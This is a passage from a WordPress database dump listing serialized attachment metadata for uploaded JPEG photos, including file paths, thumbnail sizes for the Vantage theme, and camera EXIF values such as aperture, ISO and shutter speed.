:{s:4:\"file\";s:20:\"DSC04841-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC04841-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC04841-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC04841-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1313064006\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"56.8\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(682,348,'_wp_attached_file','2017/01/DSC04860.jpg'),(683,348,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2017/01/DSC04860.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC04860-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC04860-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC04860-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC04860-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC04860-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC04860-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC04860-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC04860-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC04860-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC04860-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC04860-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC04860-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1313071310\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(684,349,'_wp_attached_file','2017/01/DSC05131.jpg'),(685,349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2017/01/DSC05131.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05131-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC05131-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC05131-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC05131-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05131-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05131-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05131-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC05131-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC05131-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC05131-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC05131-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC05131-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1333896032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(686,350,'_wp_attached_file','2017/01/DSC05132-1.jpg'),(687,350,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:22:\"2017/01/DSC05132-1.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"DSC05132-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"DSC05132-1-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"DSC05132-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1333896040\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(688,351,'_wp_attached_file','2017/01/DSCN3300.jpg'),(689,351,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3300.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3300-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3300-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3300-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3300-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3300-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3300-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3300-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3300-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3300-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3300-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3300-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1452380303\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"85.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00271739130435\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(690,352,'_wp_attached_file','2017/01/DSCN3381.jpg'),(691,352,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3381.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3381-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3381-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3381-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3381-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3381-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3381-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3381-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3381-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3381-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3381-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3381-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3381-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1459578458\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"75.7\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(692,353,'_wp_attached_file','2017/01/DSCN3472.jpg'),(693,353,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3472.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3472-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3472-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3472-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3472-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3472-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3472-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3472-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3472-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3472-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3472-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3472-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3472-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1462516241\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"18.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00390167772142\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(694,354,'_wp_attached_file','2017/01/DSCN3477.jpg'),(695,354,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3477.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3477-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3477-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3477-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3477-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3477-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3477-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3477-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3477-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3477-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3477-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3477-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3477-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1462516292\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"18.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00384615384615\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(696,355,'_wp_attached_file','2017/01/DSCN3480.jpg'),(697,355,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3480.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3480-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3480-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3480-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3480-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3480-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3480-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3480-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3480-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3480-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3480-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3480-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3480-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1462657770\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00298329355609\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(698,356,'_wp_attached_file','2017/01/DSCN3607.jpg'),(699,356,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3607.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3607-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3607-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3607-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3607-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3607-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3607-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3607-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3607-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{